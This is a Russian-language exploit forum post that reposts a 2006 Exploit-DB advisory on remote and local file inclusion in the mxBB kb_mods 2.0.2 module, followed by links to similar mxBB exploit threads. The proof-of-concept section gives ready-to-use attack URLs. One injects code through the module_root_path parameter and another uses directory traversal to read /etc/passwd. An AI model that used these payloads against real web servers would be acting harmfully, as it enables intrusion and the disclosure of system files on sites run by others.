Exploit mxBB Module kb_mods 2.0.2 - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2924
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6568 cve-2006-6567
Дата публикации
2006-12-12
Код: 
_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
                        Knowledgebase kb_mods  Multiple Remote
Vulnerablities
                            Remote File Inclusion & Local File Inclusion
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Script:knowledgebase
Version:2.0.2
Download:http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=55
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Author:Dr Max Virus
Location:Egypt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Bug in :includes/common.php
Vul Code:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Problem:The variable of phpEx & many variables are not sanitized
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
POC:
http://[target]/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=Evil Code
http://[target]/mxBB/modules/kb_mods/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=english&phpEx=../../..
/../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=
Thx to:str0ke & All My Friends
Special Gr33ts:AsianEagle & The Master & Kacper & HotTurk
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=

# milw0rm.com [2006-12-12]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit MXBB Profile Control Panel 0.91c - Module Remote File Inclusion
Ответы
0
Просмотры
430
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion
Ответы
0
Просмотры
310
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module mx_glance 2.3.3 - Remote File Inclusion
Ответы
0
Просмотры
302
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion
Ответы
0
Просмотры
305
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module pafiledb 2.0.1b - Remote File Inclusion
Ответы
0
Просмотры
304
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxbb module charts 1.0.0 - Remote File Inclusion
Ответы
0
Просмотры
311
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module Meeting 1.1.2 - Remote File Inclusion
Ответы
0
Просмотры
292
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module WebLinks 2.05 - Remote File Inclusion
Ответы
0
Просмотры
310
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit mxBB Module newssuite 1.03 - Remote File Inclusion
Ответы
0
Просмотры
291
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу